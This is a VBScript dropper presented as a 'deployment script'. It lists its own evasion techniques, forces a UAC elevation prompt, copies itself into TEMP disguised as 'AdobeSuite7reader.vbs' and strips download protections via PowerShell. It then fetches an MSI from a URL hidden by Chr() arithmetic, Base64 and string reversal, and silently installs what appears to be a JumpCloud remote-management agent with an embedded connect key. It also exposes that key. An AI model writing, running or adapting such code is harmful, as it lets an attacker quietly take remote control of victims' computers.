' Advanced Deployment Script - VBScript
' Generation ID: mq0nwjuxd2qypnu
' Applied techniques (12):
'   [+] UAC elevation (runas) when not admin
'   [+] Dead Code Insertion
'   [+] Deploy log file (%TEMP%\jc_deploy.log.txt)
'   [+] Obfuscated CreateObject
'   [+] ZIP/INetCache stage to TEMP (run-from-zip)
'   [+] String Reversal
'   [+] Base64 Encoding
'   [+] String Splitting (random chunks)
'   [+] Chr() Arithmetic Encoding
'   [+] COM Download (ServerXMLHTTP)
'   [+] Unblock downloaded MSI (MOTW)
'   [+] Direct msiexec with exit code

Option Explicit
Dim elevSh, elevCmd, elevFs, elevLog, elevLf, s6o1o, objHTTP, msiPath, u, objStream, fso, runCmd, exitCode, logPath, jcAdmin, bootSelf, bootLow, bootTemp, bootStaged, bootInArchive, bootSh, bootFs, bootDir, bootPath, bootName, bootCmd, bootCopyOk, bootCities
Function JcIsAdmin()
    On Error Resume Next
    JcIsAdmin = False
    Dim oShellApp: Set oShellApp = CreateObject("Shell.Application")
    JcIsAdmin = oShellApp.IsUserAnAdmin()
    If Err.Number <> 0 Then
        Err.Clear
        Dim oWsh: Set oWsh = CreateObject("WScript.Shell")
        Dim nRc: nRc = oWsh.Run("%comspec% /c net session >nul 2>&1", 0, True)
        JcIsAdmin = (nRc = 0)
    End If
    On Error Goto 0
End Function
If Not JcIsAdmin() Then
    Set elevSh = CreateObject("Shell.Application")
    On Error Resume Next
    Set elevFs = CreateObject("Scripting.FileSystemObject")
    elevLog = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\jc_deploy.log.txt"
    Set elevLf = elevFs.OpenTextFile(elevLog, 8, True)
    elevLf.WriteLine Now & " | Requesting UAC elevation (approve prompt to continue)..."
    elevLf.Close
    Err.Clear
    On Error Goto 0
    elevCmd = "//B //Nologo " & Chr(34) & WScript.ScriptFullName & Chr(34)
    elevSh.ShellExecute "wscript.exe", elevCmd, "", "runas", 0
    WScript.Quit 0
End If
If False Then Dim d46w2: d46w2 = 0: End If
Set s6o1o = CreateObject("WScr" & "ipt." & "Shel" & "l")
Set fso = CreateObject("Sc" & "ri" & "pt" & "in" & "g." & "Fi" & "le" & "Sy" & "st" & "em" & "Ob" & "je" & "ct")
logPath = s6o1o.ExpandEnvironmentStrings("%TEMP%") & "\jc_deploy.log.txt"
Sub LogDeploy(m)
    On Error Resume Next
    Dim lf: Set lf = fso.OpenTextFile(logPath, 8, True)
    If Err.Number = 0 Then
        lf.WriteLine Now & " | " & m
        lf.Close
    End If
    On Error Goto 0
End Sub
LogDeploy "=== Deploy started ==="
LogDeploy "Script path: " & WScript.ScriptFullName
LogDeploy "Connect key tail (last 8 - compare in JumpCloud admin): ...MGFmIn0g"
jcAdmin = JcIsAdmin()
LogDeploy "Running elevated (admin): " & jcAdmin
If Not jcAdmin Then LogDeploy "WARNING: not elevated - JumpCloud agent install usually requires Administrator"
bootSelf = WScript.ScriptFullName
bootLow = LCase(bootSelf)
bootStaged = False
bootTemp = LCase(CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%"))
bootInArchive = False
If InStr(bootLow, "inetcache\") > 0 Or InStr(bootLow, ".zip") > 0 Or InStr(bootLow, "temp1_") > 0 Or InStr(bootLow, "rar$") > 0 Or InStr(bootLow, "7z") > 0 Or (InStr(bootSelf, "[") > 0 And InStr(bootLow, "].vbs") > 0) Then bootInArchive = True
If InStr(bootLow, bootTemp) = 1 And Not bootInArchive Then bootStaged = True
If Not bootStaged And bootInArchive Then
        LogDeploy "ZIP stage: need copy out of archive"
        Set bootSh = CreateObject("WScript.Shell")
        Set bootFs = CreateObject("Scripting.FileSystemObject")
        bootCities = Array("Chicago", "Denver", "Austin", "Seattle", "Boston", "Miami", "Phoenix", "Atlanta", "Portland", "Dallas", "Houston", "Nashville", "Detroit", "Cleveland", "Minneapolis", "Tampa", "Orlando", "Sacramento", "Pittsburgh", "Charlotte")
        Randomize
        bootDir = bootSh.ExpandEnvironmentStrings("%TEMP%") & "\" & bootCities(Int(Rnd * (UBound(bootCities) + 1)))
        If Not bootFs.FolderExists(bootDir) Then bootFs.CreateFolder bootDir
        bootName = "AdobeSuite7reader.vbs"
        bootPath = bootDir & "\" & bootName
        On Error Resume Next
        bootFs.CopyFile bootSelf, bootPath, True
        bootCopyOk = (Err.Number = 0)
        Err.Clear
        On Error Goto 0
        If Not bootCopyOk And Not bootFs.FileExists(bootPath) Then
            LogDeploy "ZIP stage FAILED: cannot copy to " & bootPath & " (err copy=" & bootCopyOk & ")"
            WScript.Quit 1
        End If
        LogDeploy "ZIP stage: copied to " & bootPath
        bootCmd = "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Unblock-File -LiteralPath " & Chr(34) & bootPath & Chr(34)
        bootSh.Run bootCmd, 0, True
        bootCmd = "wscript.exe //B //Nologo " & Chr(34) & bootPath & Chr(34)
        LogDeploy "ZIP stage: relaunching staged script"
        bootSh.Run bootCmd, 0, False
        WScript.Quit 0
End If
msiPath = s6o1o.ExpandEnvironmentStrings("%TEMP%") & "\zyf3jl.msi"
Function B2S(b):Dim i,o:o="":For i=1 To LenB(b):o=o&Chr(AscB(MidB(b,i,1))):Next:B2S=o:End Function
Function B64Dec(s):Dim x,m:Set x=CreateObject("MSXML2.DOMDocument.3.0"):Set m=x.createElement("b"):m.DataType="bin.base64":m.Text=s:B64Dec=B2S(m.nodeTypedValue):End Function
Function XorStr(s,k):Dim i,r,c:r="":For i=1 To Len(s):c=Asc(Mid(s,i,1)):r=r&Chr((c And 255) Xor (k And 255)):Next:XorStr=r:End Function
u = Chr(99 - 2) & Chr(92 - 4) & Chr(81 - 3) & Chr(118 - 2) & Chr(77 - 1) & Chr(110 - 1) & Chr(86 - 4) & Chr(110 - 2) & Chr(101 - 3) & Chr(110 - 1) & Chr(104 - 4) & Chr(117 - 5) & Chr(104 - 5) & Chr(123 - 2) & Chr(53 - 4) & Chr(116 - 4) & Chr(101 - 2) & Chr(55 - 5) & Chr(49 - 1) & Chr(121 - 5) & Chr(101 - 1) & Chr(73 - 2) & Chr(55 - 2) & Chr(109 - 1) & Chr(91 - 1) & Chr(54 - 4) & Chr(72 - 2) & Chr(110 - 4) & Chr(98 - 1) & Chr(107 - 2) & Chr(59 - 3) & Chr(124 - 4) & Chr(78 - 2) & Chr(111 - 5) & Chr(110 - 3) & Chr(125 - 4) & Chr(78 - 1) & Chr(87 - 4) & Chr(57 - 5) & Chr(122 - 1) & Chr(77 - 1) & Chr(53 - 2) & Chr(82 - 4) & Chr(119 - 2) & Chr(103 - 5) & Chr(54 - 4) & Chr(112 - 4) & Chr(126 - 4) & Chr(101 - 2) & Chr(112 - 3) & Chr(90 - 4) & Chr(55 - 5) & Chr(78 - 2) & Chr(53 - 3) & Chr(54 - 1) & Chr(120 - 2) & Chr(101 - 4) & Chr(93 - 5) & Chr(87 - 5) & Chr(110 - 4) & Chr(101 - 1) & Chr(89 - 2) & Chr(84 - 2) & Chr(123 - 5) & Chr(103 - 4) & Chr(111 - 1) & Chr(69 - 4) & Chr(123 - 5) & Chr(102 - 4) & Chr(91 - 4) & Chr(61 - 4) & Chr(109 - 3) & Chr(81 - 5) & Chr(111 - 2) & Chr(86 - 4) & Chr(52 - 3) & Chr(102 - 4) & Chr(51 - 1) & Chr(124 - 4) & Chr(109 - 3) & Chr(101 - 2) & Chr(76 - 5) & Chr(52 - 3) & Chr(54 - 5) & Chr(98 - 1) & Chr(106 - 1) & Chr(57 - 5) & Chr(126 - 5) & Chr(81 - 4) & Chr(76 - 5) & Chr(54 - 1) & Chr(111 - 4) & Chr(93 - 4) & Chr(122 - 1) & Chr(59 - 3) & Chr(121 - 3) & Chr(80 - 1) & Chr(113 - 3) & Chr(81 - 3) & Chr(120 - 1) & Chr(102 - 2) & Chr(76 - 4) & Chr(83 - 1) & Chr(114 - 3)
u = B64Dec(u)
u = StrReverse(u)
LogDeploy "Downloading MSI..."
Set objHTTP = CreateObject("MSXM" & "L2.S" & "erve" & "rXML" & "HTTP" & ".6.0")
objHTTP.Open "GET", u, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
objHTTP.Send
LogDeploy "HTTP status: " & objHTTP.Status
If objHTTP.Status <> 200 Then
    LogDeploy "Download failed"
    LogDeploy "ERROR: MSI download failed (HTTP " & objHTTP.Status & ")"
    WScript.Quit 1
End If
Set objStream = CreateObject("ADO" & "DB." & "Str" & "eam")
objStream.Type = 1: objStream.Open: objStream.Write objHTTP.responseBody
objStream.SaveToFile msiPath, 2: objStream.Close
On Error Resume Next
Dim unblockCmd: unblockCmd = "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Unblock-File -LiteralPath " & Chr(34) & msiPath & Chr(34)
s6o1o.Run unblockCmd, 0, True
Err.Clear
On Error Goto 0
LogDeploy "Saved MSI: " & msiPath
If Not fso.FileExists(msiPath) Or fso.GetFile(msiPath).Size = 0 Then
    LogDeploy "MSI missing or empty after download"
    LogDeploy "ERROR: Downloaded MSI file is missing or empty"
    WScript.Quit 1
End If
runCmd = "msiexec /i """ & msiPath & """ /quiet JCINSTALLERARGUMENTS=" & Chr(34) & "-k jcc_eyJwdWJsaWNLaWNrc3RhcnRVcmwiOiJodHRwczovL2tpY2tzdGFydC5qdW1wY2xvdWQuY29tIiwicHJpdmF0ZUtpY2tzdGFydFVybCI6Imh0dHBzOi8vcHJpdmF0ZS1raWNrc3RhcnQuanVtcGNsb3VkLmNvbSIsImNvbm5lY3RLZXkiOiJkZDA5MzljOWQ3NTIzZjJlNTQ1NDI5YWIxN2VjOGRhNWZhNmFjMGFmIn0g /VERYSILENT /SUPPRESSMSGBOXES /norestart" & Chr(34)
Dim msiLogPath: msiLogPath = s6o1o.ExpandEnvironmentStrings("%TEMP%") & "\jc_msi_verbose.log"
runCmd = Replace(runCmd, "msiexec /i", "msiexec /l*v """ & msiLogPath & """ /i", 1, 1)
LogDeploy "Launching: " & runCmd
LogDeploy "MSI verbose log: " & msiLogPath
exitCode = s6o1o.Run(runCmd, 0, True)
LogDeploy "msiexec exitCode=" & exitCode
If exitCode <> 0 And exitCode <> 3010 And exitCode <> 1638 Then
    LogDeploy "ERROR: Install failed (msiexec exit " & exitCode & ")"
    If exitCode = 1603 Then
        LogDeploy "HINT 1603: invalid -k jcc_ key, partial/broken prior install, or agent already enrolled - verify connect key in admin console; uninstall JumpCloud Agent before re-deploy if needed"
        LogDeploy "HINT 1603: open %TEMP%\jc_msi_verbose.log for exact Windows Installer error"
    ElseIf exitCode = 1602 Then
        LogDeploy "HINT 1602: install cancelled or UI closed - uncheck Visible MSI Install; use silent deploy only"
    ElseIf exitCode = 1618 Then
        LogDeploy "HINT 1618: another msiexec install is in progress - wait for it to finish and run once"
    End If
Else
    LogDeploy "=== Deploy finished OK ==="
End If